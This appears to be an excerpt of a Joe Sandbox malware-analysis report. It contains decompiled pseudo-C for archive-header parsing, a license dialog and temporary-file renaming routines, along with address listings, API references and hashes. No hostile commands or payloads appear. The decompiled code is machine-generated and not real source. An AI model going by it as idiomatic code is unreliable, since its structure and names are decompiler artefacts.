Part of subcall function 000884DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0008BFA7,00093958,00000000,00093958,00000000,?,0008BFCE,00093958,00000007,00093958,?,0008C3CB,00093958), ref: 000884F4
Part of subcall function 000884DE: GetLastError.KERNEL32(00093958,?,0008BFA7,00093958,00000000,00093958,00000000,?,0008BFCE,00093958,00000007,00093958,?,0008C3CB,00093958,00093958), ref: 00088506

_free.LIBCMT ref: 00088ED1
_free.LIBCMT ref: 00088EDC
_free.LIBCMT ref: 00088EE7
_free.LIBCMT ref: 00088EF2
_free.LIBCMT ref: 00088EFD
_free.LIBCMT ref: 00088F08
_free.LIBCMT ref: 00088F13
_free.LIBCMT ref: 00088F1E
_free.LIBCMT ref: 00088F2C

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: a8312b085edb188063c868f0270846e93aab0c491e36fc02e4604f9962a13351
Instruction ID: e792fa83d1779d69e95b4f670307bccc0ce5484ba076dab0bc78b352170c5264
Opcode Fuzzy Hash: a8312b085edb188063c868f0270846e93aab0c491e36fc02e4604f9962a13351
Instruction Fuzzy Hash: 0A11A27651010DAFCB11FF94C842CDA3BA5FF04350B9190A5BA488B666DA32EE51DB80

Uniqueness

Uniqueness Score: -1.00%

Function 00062162 Relevance: 14.5, APIs: 5, Strings: 3, Instructions: 480
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00062162(intOrPtr __ecx) {
				signed int _t135;
				void* _t137;
				signed int _t139;
				unsigned int _t140;
				signed int _t144;
				signed int _t161;
				signed int _t164;
				void* _t167;
				void* _t172;
				signed int _t175;
				signed char _t178;
				signed char _t179;
				signed char _t180;
				signed int _t182;
				signed int _t185;
				signed int _t187;
				signed int _t188;
				signed char _t220;
				signed char _t232;
				signed int _t233;
				signed int _t236;
				intOrPtr _t240;
				signed int _t244;
				signed int _t246;
				signed int _t247;
				signed int _t257;
				signed int _t258;
				signed char _t262;
				signed int _t263;
				signed int _t265;
				intOrPtr _t272;
				intOrPtr _t275;
				intOrPtr _t278;
				intOrPtr _t314;
				signed int _t315;
				intOrPtr _t318;
				signed int _t322;
				void* _t323;
				void* _t324;
				void* _t326;
				void* _t327;
				void* _t328;
				void* _t329;
				void* _t330;
				void* _t331;
				void* _t332;
				void* _t333;
				void* _t334;
				intOrPtr* _t336;
				signed int _t339;
				void* _t340;
				signed int _t341;
				char* _t342;
				void* _t343;
				void* _t344;
				signed int _t348;
				signed int _t351;
				signed int _t366;

				E0007E360();
				_t318 =  *((intOrPtr*)(_t344 + 0x20b8));
				 *((intOrPtr*)(_t344 + 0xc)) = __ecx;
				_t314 =  *((intOrPtr*)(_t318 + 0x18));
				_t135 = _t314 -  *((intOrPtr*)(_t344 + 0x20bc));
				if(_t135 <  *(_t318 + 0x1c)) {
					L104:
					return _t135;
				}
				_t315 = _t314 - _t135;
				 *(_t318 + 0x1c) = _t135;
				if(_t315 >= 2) {
					_t240 =  *((intOrPtr*)(_t344 + 0x20c4));
					while(1) {
						_t135 = E0006C6E0(_t315);
						_t244 = _t135;
						_t348 = _t315;
						if(_t348 < 0 || _t348 <= 0 && _t244 == 0) {
							break;
						}
						_t322 =  *(_t318 + 0x1c);
						_t135 =  *((intOrPtr*)(_t318 + 0x18)) - _t322;
						if(_t135 == 0) {
							break;
						}
						_t351 = _t315;
						if(_t351 > 0 || _t351 >= 0 && _t244 > _t135) {
							break;
						} else {
							_t339 = _t322 + _t244;
							 *(_t344 + 0x28) = _t339;
							_t137 = E0006C6E0(_t315);
							_t340 = _t339 -  *(_t318 + 0x1c);
							_t323 = _t137;
							_t135 = _t315;
							_t246 = 0;
							 *(_t344 + 0x24) = _t135;
							 *(_t344 + 0x20) = 0;
							if(0 < 0 || 0 <= 0 && _t340 < 0) {
								break;
							} else {
								if( *((intOrPtr*)(_t240 + 4)) == 1 && _t323 == 1 && _t135 == 0) {
									 *((char*)(_t240 + 0x1e)) = 1;
									_t232 = E0006C6E0(_t315);
									 *(_t344 + 0x1c) = _t232;
									if((_t232 & 0x00000001) != 0) {
										_t236 = E0006C6E0(_t315);
										if((_t236 | _t315) != 0) {
											asm("adc eax, edx");
											 *((intOrPtr*)(_t240 + 0x20)) =  *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x18)) + 0x6ca0)) + _t236;
											 *((intOrPtr*)(_t240 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x18)) + 0x6ca4));
										}
										_t232 =  *(_t344 + 0x1c);
									}
									if((_t232 & 0x00000002) != 0) {
										_t233 = E0006C6E0(_t315);
										if((_t233 | _t315) != 0) {
											asm("adc eax, edx");
											 *((intOrPtr*)(_t240 + 0x30)) =  *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x18)) + 0x6ca0)) + _t233;
											 *((intOrPtr*)(_t240 + 0x34)) =  *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x18)) + 0x6ca4));
										}
									}
									_t246 =  *(_t344 + 0x20);
									_t135 =  *(_t344 + 0x24);
								}
								if( *((intOrPtr*)(_t240 + 4)) == 2 ||  *((intOrPtr*)(_t240 + 4)) == 3) {
									_t366 = _t135;
									if(_t366 > 0 || _t366 >= 0 && _t323 > 7) {
										goto L102;
									} else {
										_t324 = _t323 - 1;
										if(_t324 == 0) {
											_t139 = E0006C6E0(_t315);
											__eflags = _t139;
											if(_t139 == 0) {
												_t140 = E0006C6E0(_t315);
												 *(_t240 + 0x10c1) = _t140 & 0x00000001;
												 *(_t240 + 0x10ca) = _t140 >> 0x00000001 & 0x00000001;
												_t144 = E0006C593(_t318) & 0x000000ff;
												 *(_t240 + 0x10ec) = _t144;
												__eflags = _t144 - 0x18;
												if(_t144 > 0x18) {
													E0006400A(_t344 + 0x38, 0x14, L"xc%u", _t144);
													_t257 =  *(_t344 + 0x28);
													_t167 = _t344 + 0x40;
													_t344 = _t344 + 0x10;
													E00063FB5(_t257, _t240 + 0x28, _t167);
												}
												E0006C642(_t318, _t240 + 0x10a1, 0x10);
												E0006C642(_t318, _t240 + 0x10b1, 0x10);
												__eflags =  *(_t240 + 0x10c1);
												if( *(_t240 + 0x10c1) != 0) {
													_t325 = _t240 + 0x10c2;
													E0006C642(_t318, _t240 + 0x10c2, 8);
													E0006C642(_t318, _t344 + 0x30, 4);
													E0006F8C7(_t344 + 0x58);
													E0006F90D(_t344 + 0x60, _t240 + 0x10c2, 8);
													_push(_t344 + 0x30);
													E0006F7D6(_t344 + 0x5c);
													_t161 = E0007FDFA(_t344 + 0x34, _t344 + 0x34, 4);
													_t344 = _t344 + 0xc;
													asm("sbb al, al");
													__eflags =  *((intOrPtr*)(_t240 + 4)) - 3;
													 *(_t240 + 0x10c1) =  ~_t161 + 1;
													if( *((intOrPtr*)(_t240 + 4)) == 3) {
														_t164 = E0007FDFA(_t325, 0x93668, 8);
														_t344 = _t344 + 0xc;
														__eflags = _t164;
														if(_t164 == 0) {
															 *(_t240 + 0x10c1) = _t164;
														}
													}
												}
												 *((char*)(_t240 + 0x10a0)) = 1;
												 *((intOrPtr*)(_t240 + 0x109c)) = 5;
												 *((char*)(_t240 + 0x109b)) = 1;
											} else {
												E0006400A(_t344 + 0x38, 0x14, L"x%u", _t139);
												_t258 =  *(_t344 + 0x28);
												_t172 = _t344 + 0x40;
												_t344 = _t344 + 0x10;
												E00063FB5(_t258, _t240 + 0x28, _t172);
											}
											goto L102;
										}
										_t326 = _t324 - 1;
										if(_t326 == 0) {
											_t175 = E0006C6E0(_t315);
											__eflags = _t175;
											if(_t175 != 0) {
												goto L102;
											}
											_push(0x20);
											 *((intOrPtr*)(_t240 + 0x1070)) = 3;
											_push(_t240 + 0x1074);
											L40:
											E0006C642(_t318);
											goto L102;
										}
										_t327 = _t326 - 1;
										if(_t327 == 0) {
											__eflags = _t246;
											if(__eflags < 0) {
												goto L102;
											}
											if(__eflags > 0) {
												L65:
												_t178 = E0006C6E0(_t315);
												 *(_t344 + 0x13) = _t178;
												_t179 = _t178 & 0x00000001;
												_t262 =  *(_t344 + 0x13);
												 *(_t344 + 0x14) = _t179;
												_t315 = _t262 & 0x00000002;
												__eflags = _t315;
												 *(_t344 + 0x15) = _t315;
												if(_t315 != 0) {
													_t278 = _t318;
													__eflags = _t179;
													if(__eflags == 0) {
														E00070DFC(_t240 + 0x1040, _t315, E0006C622(_t278, __eflags), _t315);
													} else {
														E00070DBD(_t240 + 0x1040, _t315, E0006C5E0(_t278), 0);
													}
													_t262 =  *(_t344 + 0x13);
													_t179 =  *(_t344 + 0x14);
												}
												_t263 = _t262 & 0x00000004;
												__eflags = _t263;
												 *(_t344 + 0x16) = _t263;
												if(_t263 != 0) {
													_t275 = _t318;
													__eflags = _t179;
													if(__eflags == 0) {
														E00070DFC(_t240 + 0x1048, _t315, E0006C622(_t275, __eflags), _t315);
													} else {
														E00070DBD(_t240 + 0x1048, _t315, E0006C5E0(_t275), 0);
													}
												}
												_t180 =  *(_t344 + 0x13);
												_t265 = _t180 & 0x00000008;
												__eflags = _t265;
												 *(_t344 + 0x17) = _t265;
												if(_t265 != 0) {
													__eflags =  *(_t344 + 0x14);
													_t272 = _t318;
													if(__eflags == 0) {
														E00070DFC(_t240 + 0x1050, _t315, E0006C622(_t272, __eflags), _t315);
													} else {
														E00070DBD(_t240 + 0x1050, _t315, E0006C5E0(_t272), 0);
													}
													_t180 =  *(_t344 + 0x13);
												}
												__eflags =  *(_t344 + 0x14);
												if( *(_t344 + 0x14) != 0) {
													__eflags = _t180 & 0x00000010;
													if((_t180 & 0x00000010) != 0) {
														__eflags =  *(_t344 + 0x15);
														if( *(_t344 + 0x15) == 0) {
															_t341 = 0x3fffffff;
															_t328 = 0x3b9aca00;
														} else {
															_t187 = E0006C5E0(_t318);
															_t341 = 0x3fffffff;
															_t328 = 0x3b9aca00;
															_t188 = _t187 & 0x3fffffff;
															__eflags = _t188 - 0x3b9aca00;
															if(_t188 < 0x3b9aca00) {
																E00070A7A(_t240 + 0x1040, _t188, 0);
															}
														}
														__eflags =  *(_t344 + 0x16);
														if( *(_t344 + 0x16) != 0) {
															_t185 = E0006C5E0(_t318) & _t341;
															__eflags = _t185 - _t328;
															if(_t185 < _t328) {
																E00070A7A(_t240 + 0x1048, _t185, 0);
															}
														}
														__eflags =  *(_t344 + 0x17);
														if( *(_t344 + 0x17) != 0) {
															_t182 = E0006C5E0(_t318) & _t341;
															__eflags = _t182 - _t328;
															if(_t182 < _t328) {
																E00070A7A(_t240 + 0x1050, _t182, 0);
															}
														}
													}
												}
												goto L102;
											}
											__eflags = _t340 - 5;
											if(_t340 < 5) {
												goto L102;
											}
											goto L65;
										}
										_t329 = _t327 - 1;
										if(_t329 == 0) {
											__eflags = _t246;
											if(__eflags < 0) {
												goto L102;
											}
											if(__eflags > 0) {
												L60:
												E0006C6E0(_t315);
												__eflags = E0006C6E0(_t315);
												if(__eflags != 0) {
													 *((char*)(_t240 + 0x10f3)) = 1;
													E0006400A(_t344 + 0x38, 0x14, L";%u", _t203);
													_t344 = _t344 + 0x10;
													E0006FE2E(__eflags, _t240 + 0x28, _t344 + 0x30, 0x800);
												}
												goto L102;
											}
											__eflags = _t340 - 1;
											if(_t340 < 1) {
												goto L102;
											}
											goto L60;
										}
										_t330 = _t329 - 1;
										if(_t330 == 0) {
											 *((intOrPtr*)(_t240 + 0x1100)) = E0006C6E0(_t315);
											 *(_t240 + 0x2104) = E0006C6E0(_t315) & 0x00000001;
											_t331 = E0006C6E0(_t315);
											 *((char*)(_t344 + 0xc0)) = 0;
											__eflags = _t331 - 0x1fff;
											if(_t331 < 0x1fff) {
												E0006C642(_t318, _t344 + 0xc4, _t331);
												 *((char*)(_t344 + _t331 + 0xc0)) = 0;
											}
											E0006BD20(_t344 + 0xc4, _t344 + 0xc4, 0x2000);
											_push(0x800);
											_push(_t240 + 0x1104);
											_push(_t344 + 0xc8);
											E00071430();
											goto L102;
										}
										_t332 = _t330 - 1;
										if(_t332 == 0) {
											_t220 = E0006C6E0(_t315);
											 *(_t344 + 0x1c) = _t220;
											_t342 = _t240 + 0x2108;
											 *(_t240 + 0x2106) = _t220 >> 0x00000002 & 0x00000001;
											 *(_t240 + 0x2107) = _t220 >> 0x00000003 & 0x00000001;
											 *((char*)(_t240 + 0x2208)) = 0;
											 *_t342 = 0;
											__eflags = _t220 & 0x00000001;
											if((_t220 & 0x00000001) != 0) {
												_t334 = E0006C6E0(_t315);
												__eflags = _t334 - 0xff;
												if(_t334 >= 0xff) {
													_t334 = 0xff;
												}
												E0006C642(_t318, _t342, _t334);
												_t220 =  *(_t344 + 0x1c);
												 *((char*)(_t334 + _t342)) = 0;
											}
											__eflags = _t220 & 0x00000002;
											if((_t220 & 0x00000002) != 0) {
												_t333 = E0006C6E0(_t315);
												__eflags = _t333 - 0xff;
												if(_t333 >= 0xff) {
													_t333 = 0xff;
												}
												_t343 = _t240 + 0x2208;
												E0006C642(_t318, _t343, _t333);
												 *((char*)(_t333 + _t343)) = 0;
											}
											__eflags =  *(_t240 + 0x2106);
											if( *(_t240 + 0x2106) != 0) {
												 *((intOrPtr*)(_t240 + 0x2308)) = E0006C6E0(_t315);
											}
											__eflags =  *(_t240 + 0x2107);
											if( *(_t240 + 0x2107) != 0) {
												 *((intOrPtr*)(_t240 + 0x230c)) = E0006C6E0(_t315);
											}
											 *((char*)(_t240 + 0x2105)) = 1;
											goto L102;
										}
										if(_t332 != 1) {
											goto L102;
										}
										if( *((intOrPtr*)(_t240 + 4)) == 3 &&  *((intOrPtr*)(_t318 + 0x18)) -  *(_t344 + 0x28) == 1) {
											_t340 = _t340 + 1;
										}
										_t336 = _t240 + 0x1028;
										E00062034(_t336, _t340);
										_push(_t340);
										_push( *_t336);
										goto L40;
									}
								} else {
									L102:
									_t247 =  *(_t344 + 0x28);
									 *(_t318 + 0x1c) = _t247;
									_t135 =  *((intOrPtr*)(_t318 + 0x18)) - _t247;
									if(_t135 >= 2) {
										continue;
									}
									break;
								}
							}
						}
					}
				}
			}

0x00062167
0x0006216d
0x00062174
0x00062178
0x0006217d
0x00062187
0x000627de
0x000627e5
0x000627e5
0x0006218d
0x0006218f
0x00062195
0x0006219c
0x000621a5
0x000621a7
0x000621ac
0x000621ae
0x000621b0
0x00000000
0x00000000
0x000621c3
0x000621c6
0x000621c8
0x00000000
0x00000000
0x000621ce
0x000621d0
0x00000000
0x000621e0
0x000621e0
0x000621e5
0x000621e9
0x000621ee
0x000621f1
0x000621f3
0x000621f5
0x000621f7
0x000621fb
0x000621ff
0x00000000
0x0006220f
0x00062213
0x00062224
0x00062228
0x0006222d
0x00062233
0x00062237
0x00062240
0x00062258
0x0006225a
0x0006225d
0x0006225d
0x00062260
0x00062260
0x00062266
0x0006226a
0x00062273
0x0006228b
0x0006228d
0x00062290
0x00062290
0x00062273
0x00062293
0x00062297
0x00062297
0x0006229f
0x000622ab
0x000622ad
0x00000000
0x000622be
0x000622be
0x000622c1
0x00062670
0x00062675
0x00062677
0x000626a7
0x000626b5
0x000626bd
0x000626c8
0x000626cb
0x000626d1
0x000626d4
0x000626e3
0x000626e8
0x000626ec
0x000626f0
0x000626f8
0x000626f8
0x00062708
0x00062718
0x0006271d
0x00062724
0x0006272c
0x00062735
0x00062743
0x0006274d
0x0006275a
0x00062763
0x00062769
0x0006277a
0x0006277f
0x00062784
0x00062788
0x0006278c
0x00062792
0x0006279c
0x000627a1
0x000627a4
0x000627a6
0x000627a8
0x000627a8
0x000627a6
0x00062792
0x000627ae
0x000627b5
0x000627bf
0x00062679
0x00062686
0x0006268b
0x0006268f
0x00062693
0x0006269b
0x0006269b
0x00000000
0x00062677
0x000622c7
0x000622ca
0x00062649
0x0006264e
0x00062650
0x00000000
0x00000000
0x00062656
0x0006265e
0x00062668
0x0006231f
0x00062321
0x00000000
0x00062321
0x000622d0
0x000622d3
0x000624ca
0x000624cc
0x00000000
0x00000000
0x000624d2
0x000624dd
0x000624df
0x000624e4
0x000624e8
0x000624ea
0x000624f0
0x000624f4
0x000624f4
0x000624f7
0x000624fb
0x000624fd
0x000624ff
0x00062501
0x00062525
0x00062503
0x00062511
0x00062511
0x0006252a
0x0006252e
0x0006252e
0x00062532
0x00062532
0x00062535
0x00062539
0x0006253b
0x0006253d
0x0006253f
0x00062563
0x00062541
0x0006254f
0x0006254f
0x0006253f
0x00062568
0x0006256e
0x0006256e
0x00062571
0x00062575
0x00062577
0x0006257c
0x0006257e
0x000625a2
0x00062580
0x0006258e
0x0006258e
0x000625a7
0x000625a7
0x000625ab
0x000625b0
0x000625b6
0x000625b8
0x000625be
0x000625c3
0x000625ec
0x000625f1
0x000625c5
0x000625c7
0x000625cc
0x000625d1
0x000625d6
0x000625d8
0x000625da
0x000625e5
0x000625e5
0x000625da
0x000625f6
0x000625fb
0x00062604
0x00062606
0x00062608
0x00062613
0x00062613
0x00062608
0x00062618
0x0006261d
0x0006262a
0x0006262c
0x0006262e
0x0006263d
0x0006263d
0x0006262e
0x0006261d
0x000625b8
0x00000000
0x000625b0
0x000624d4
0x000624d7
0x00000000
0x00000000
0x00000000
0x000624d7
0x000622d9
0x000622dc
0x0006246d
0x0006246f
0x00000000
0x00000000
0x00062475
0x00062480
0x00062482
0x0006248e
0x00062490
0x000624a0
0x000624aa
0x000624af
0x000624c0
0x000624c0
0x00000000
0x00062490
0x00062477
0x0006247a
0x00000000
0x00000000
0x00000000
0x0006247a
0x000622e2
0x000622e5
0x000623f8
0x00062407
0x00062412
0x00062414
0x0006241c
0x00062422
0x0006242f
0x00062434
0x00062434
0x0006244a
0x0006244f
0x0006245a
0x00062462
0x00062463
0x00000000
0x00062463
0x000622eb
0x000622ee
0x0006232d
0x00062334
0x0006233b
0x00062344
0x00062352
0x00062358
0x0006235f
0x00062363
0x00062365
0x0006236e
0x00062375
0x00062377
0x00062379
0x00062379
0x0006237f
0x00062384
0x00062388
0x00062388
0x0006238c
0x0006238e
0x00062397
0x0006239e
0x000623a0
0x000623a2
0x000623a2
0x000623a5
0x000623ae
0x000623b3
0x000623b3
0x000623b7
0x000623be
0x000623c7
0x000623c7
0x000623cd
0x000623d4
0x000623dd
0x000623dd
0x000623e3
0x00000000
0x000623e3
0x000622f3
0x00000000
0x00000000
0x000622fd
0x0006230b
0x0006230b
0x0006230e
0x00062317
0x0006231c
0x0006231d
0x00000000
0x0006231d
0x000627c6
0x000627c6
0x000627c6
0x000627ca
0x000627d0
0x000627d5
0x00000000
0x00000000
0x00000000
0x000627d5
0x0006229f
0x000621ff
0x000621d0
0x000627dd

Strings

;%u, xrefs: 00062497
x%u, xrefs: 0006267A
xc%u, xrefs: 000626D7

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID:
String ID: ;%u$x%u$xc%u
API String ID: 0-2277559157
Opcode ID: 547208bb5b0fb3adbf075e3498a2453b0c036fae2a7c57c16af0dc768eeace27
Instruction ID: 79b7543b75daa834de8611764e5e5e52008d6105ce08367e9489d9485b6bffc2
Opcode Fuzzy Hash: 547208bb5b0fb3adbf075e3498a2453b0c036fae2a7c57c16af0dc768eeace27
Instruction Fuzzy Hash: 42F125716087815BEB25EF38C895FFE77D76F94300F084569F886CB283DA249948C7A6

Uniqueness

Uniqueness Score: -1.00%

Function 0007ACD0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98
windowCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E0007ACD0(void* __ecx, void* __edx, void* __eflags, void* __fp0, struct HWND__* _a4, intOrPtr _a8, signed short _a12, intOrPtr _a16) {
				long _t9;
				long _t10;
				WCHAR* _t11;
				void* _t25;
				signed short _t28;
				void* _t29;
				intOrPtr _t30;
				struct HWND__* _t34;
				intOrPtr _t35;
				void* _t36;
				struct HWND__* _t37;

				_t29 = __ecx;
				_t28 = _a12;
				_t35 = _a8;
				_t34 = _a4;
				if(E0006130B(__edx, _t34, _t35, _t28, _a16, L"LICENSEDLG", 0, 0) != 0) {
					L16:
					__eflags = 1;
					return 1;
				}
				_t36 = _t35 - 0x110;
				if(_t36 == 0) {
					E0007CD2E(_t29, __edx, __eflags, __fp0, _t34);
					_t9 =  *0xac574;
					__eflags = _t9;
					if(_t9 != 0) {
						SendMessageW(_t34, 0x80, 1, _t9);
					}
					_t10 =  *0xb6b7c;
					__eflags = _t10;
					if(_t10 != 0) {
						SendDlgItemMessageW(_t34, 0x66, 0x172, 0, _t10);
					}
					_t11 =  *0xbec94;
					__eflags = _t11;
					if(__eflags != 0) {
						SetWindowTextW(_t34, _t11);
					}
					_t37 = GetDlgItem(_t34, 0x65);
					SendMessageW(_t37, 0x435, 0, 0x10000);
					SendMessageW(_t37, 0x443, 0,  *0xc20c8(0xf));
					 *0xc20c4(_t34);
					_t30 =  *0xa8444; // 0x0
					E00079635(_t30, __eflags,  *0xa0ed4, _t37,  *0xbec90, 0, 0);
					L000835CE( *0xbec94);
					L000835CE( *0xbec90);
					goto L16;
				}
				if(_t36 != 1) {
					L5:
					return 0;
				}
				_t25 = (_t28 & 0x0000ffff) - 1;
				if(_t25 == 0) {
					_push(1);
					L7:
					EndDialog(_t34, ??);
					goto L16;
				}
				if(_t25 == 1) {
					_push(0);
					goto L7;
				}
				goto L5;
			}

0x0007acd0
0x0007acd1
0x0007acd7
0x0007acde
0x0007acf7
0x0007ade3
0x0007ade5
0x00000000
0x0007ade5
0x0007acfd
0x0007ad03
0x0007ad30
0x0007ad35
0x0007ad3a
0x0007ad3c
0x0007ad47
0x0007ad47
0x0007ad4d
0x0007ad52
0x0007ad54
0x0007ad60
0x0007ad60
0x0007ad66
0x0007ad6b
0x0007ad6d
0x0007ad71
0x0007ad71
0x0007ad86
0x0007ad8e
0x0007ada4
0x0007adab
0x0007adb1
0x0007adc6
0x0007add1
0x0007addc
0x00000000
0x0007ade2
0x0007ad08
0x0007ad17
0x00000000
0x0007ad17
0x0007ad0d
0x0007ad10
0x0007ad2b
0x0007ad1f
0x0007ad20
0x00000000
0x0007ad20
0x0007ad15
0x0007ad1e
0x00000000
0x0007ad1e
0x00000000

APIs

Part of subcall function 0006130B: GetDlgItem.USER32(00000000,00003021), ref: 0006134F
Part of subcall function 0006130B: SetWindowTextW.USER32(00000000,000935B4), ref: 00061365

EndDialog.USER32(?,00000001), ref: 0007AD20
SendMessageW.USER32(?,00000080,00000001,?), ref: 0007AD47
SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0007AD60
SetWindowTextW.USER32(?,?), ref: 0007AD71
GetDlgItem.USER32(?,00000065), ref: 0007AD7A
SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0007AD8E
SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0007ADA4

Strings

LICENSEDLG, xrefs: 0007ACE4

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: MessageSend$Item$TextWindow$Dialog
String ID: LICENSEDLG
API String ID: 3214253823-2177901306
Opcode ID: 4c38223fc14a26999fa9a2eb7cbce8d617217ab25a9a70178c4bdb98e3be8a28
Instruction ID: 6a32d6f2f22812c2f656eea035b150a38f75065f7e5d7b6d8dd806bdea99b107
Opcode Fuzzy Hash: 4c38223fc14a26999fa9a2eb7cbce8d617217ab25a9a70178c4bdb98e3be8a28
Instruction Fuzzy Hash: 4021B631644204BBF2315B61DD49EBF3FACF78BB46F014115F60A968A2CB5D5D01D636

Uniqueness

Uniqueness Score: -1.00%

Function 00069443 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136
fileCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E00069443(void* __ecx) {
				void* __esi;
				void* _t31;
				short _t32;
				long _t34;
				void* _t39;
				short _t41;
				void* _t65;
				intOrPtr _t68;
				void* _t76;
				intOrPtr _t79;
				void* _t81;
				WCHAR* _t82;
				void* _t84;
				void* _t86;

				E0007E28C(E00091E7C, _t84);
				E0007E360();
				_t82 =  *(_t84 + 8);
				_t31 = _t84 - 0x4038;
				__imp__GetLongPathNameW(_t82, _t31, 0x800, _t76, _t81, _t65);
				if(_t31 == 0 || _t31 >= 0x800) {
					L20:
					_t32 = 0;
					__eflags = 0;
				} else {
					_t34 = GetShortPathNameW(_t82, _t84 - 0x5038, 0x800);
					if(_t34 == 0) {
						goto L20;
					} else {
						_t91 = _t34 - 0x800;
						if(_t34 >= 0x800) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t84 - 0x10)) = E0006BC85(_t91, _t84 - 0x4038);
							_t78 = E0006BC85(_t91, _t84 - 0x5038);
							_t68 = 0;
							if( *_t38 == 0) {
								goto L20;
							} else {
								_t39 = E000717AC( *((intOrPtr*)(_t84 - 0x10)), _t78);
								_t93 = _t39;
								if(_t39 == 0) {
									goto L20;
								} else {
									_t41 = E000717AC(E0006BC85(_t93, _t82), _t78);
									if(_t41 != 0) {
										goto L20;
									} else {
										 *(_t84 - 0x1010) = _t41;
										_t79 = 0;
										while(1) {
											_t95 = _t41;
											if(_t41 != 0) {
												break;
											}
											E0006FE56(_t84 - 0x1010, _t82, 0x800);
											E0006400A(E0006BC85(_t95, _t84 - 0x1010), 0x800, L"rtmp%d", _t79);
											_t86 = _t86 + 0x10;
											if(E0006A180(_t84 - 0x1010) == 0) {
												_t41 =  *(_t84 - 0x1010);
											} else {
												_t41 = 0;
												 *(_t84 - 0x1010) = 0;
											}
											_t79 = _t79 + 0x7b;
											if(_t79 < 0x2710) {
												continue;
											} else {
												_t98 = _t41;
												if(_t41 == 0) {
													goto L20;
												} else {
													break;
												}
											}
											goto L21;
										}
										E0006FE56(_t84 - 0x3038, _t82, 0x800);
										_push(0x800);
										E0006BCFB(_t98, _t84 - 0x3038,  *((intOrPtr*)(_t84 - 0x10)));
										if(MoveFileW(_t84 - 0x3038, _t84 - 0x1010) == 0) {
											goto L20;
										} else {
											E00069619(_t84 - 0x2038);
											 *((intOrPtr*)(_t84 - 4)) = _t68;
											if(E0006A180(_t82) == 0) {
												_push(0x12);
												_push(_t82);
												_t68 = E0006971E(_t84 - 0x2038);
											}
											MoveFileW(_t84 - 0x1010, _t84 - 0x3038);
											if(_t68 != 0) {
												E000696D0(_t84 - 0x2038);
												E00069817(_t84 - 0x2038, _t82);
											}
											E00069653(_t84 - 0x2038, _t82);
											_t32 = 1;
										}
									}
								}
							}
						}
					}
				}
				L21:
				 *[fs:0x0] =  *((intOrPtr*)(_t84 - 0xc));
				return _t32;
			}

0x00069448
0x00069452
0x00069459
0x0006945c
0x0006946b
0x00069473
0x00069604
0x00069604
0x00069604
0x00069481
0x0006948a
0x00069492
0x00000000
0x00069498
0x00069498
0x0006949a
0x00000000
0x000694a0
0x000694ac
0x000694bb
0x000694bd
0x000694c2
0x00000000
0x000694c8
0x000694cc
0x000694d1
0x000694d3
0x00000000
0x000694d9
0x000694e1
0x000694e8
0x00000000
0x000694ee
0x000694ee
0x000694f5
0x000694f7
0x000694f7
0x000694fa
0x00000000
0x00000000
0x00069509
0x00069526
0x0006952b
0x0006953c
0x00069549
0x0006953e
0x0006953e
0x00069540
0x00069540
0x00069550
0x00069559
0x00000000
0x0006955b
0x0006955b
0x0006955e
0x00000000
0x00000000
0x00000000
0x00000000
0x0006955e
0x00000000
0x00069559
0x00069572
0x00069577
0x00069582
0x0006959d
0x00000000
0x0006959f
0x000695a5
0x000695ab
0x000695b5
0x000695b7
0x000695b9
0x000695c5
0x000695c5
0x000695d5
0x000695dd
